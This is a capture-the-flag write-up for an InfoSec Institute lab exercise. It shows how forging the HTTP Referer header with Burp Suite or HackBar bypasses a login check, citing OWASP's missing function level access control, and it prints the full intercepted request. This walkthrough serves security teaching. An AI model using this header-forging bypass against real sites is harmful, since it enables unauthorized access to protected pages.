Description: It seems you have encountered a page which requires users to login before viewing. Do some magic without having to log in.
Vulnerability: OWASP A7 Missing Function Level Access Control
You need to modify the HTTP_REFERER
You need to imitate that the login page is redirecting you to the exercise 5’s page.
Based on OWASP description A7 Missing Function Level Access Control is “Many web applications check URL access rights before rendering protected links and buttons. However, applications need to perform similar access control checks each time these pages are accessed, or attackers will be able to forge URLs to access these hidden pages anyway.” So the basic idea is forge URL to access the hidden pages.
The web page have a Login button but cannot click, so I check the source code and found
<p class="lead">You are not logged in. Please <a class="btn btn-sm btn-info" disabled href="login.html">login</a> to access this page.</p>
There is login.html but disabled, I try to access
Then I intercept with burp, it seem the referer is missing in the header, so I put it on the repeater and then add referer line on the header.
GET /ctf2/exercises/ex5.php HTTP/1.1 Host: ctf.infosecinstitute.com User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:39.0) Gecko/20100101 Firefox/39.0 Accept: */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate X-Requested-With: XMLHttpRequest Referer: http://ctf.infosecinstitute.com/ctf2/exercises/login.html Cookie: _ga=GA1.2.2097500748.1426146732; visitor_id12882=197992830; __distillery=v20150227_3d92622f-8940-44b8-8c2e-fbfba9e66052; __utma=192755314.2097500748.1426146732.1427136730.1427302672.2; __utmz=192755314.1427136730.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=9okprgbh057f1bg5jqjal83sq3 Connection: keep-alive
I pass to level 6, so it’s not forge the URL but adding the referer so I can get the hidden pages.
how about bypass in the web directly, after looking awhile for an Add-on for firefox, I’m using HackBar Add-on so I can add the Referer.
Resources and Tools:
1. OWASP A7 Missing Function Level Access Control – https://github.com/OWASP/railsgoat/wiki/A7-Missing-Function-Level-Access-Control–%28Admin-Controller%29
2. Burp Suite
3. HackBar Firefox Add-on – https://addons.mozilla.org/en-US/firefox/addon/hackbar/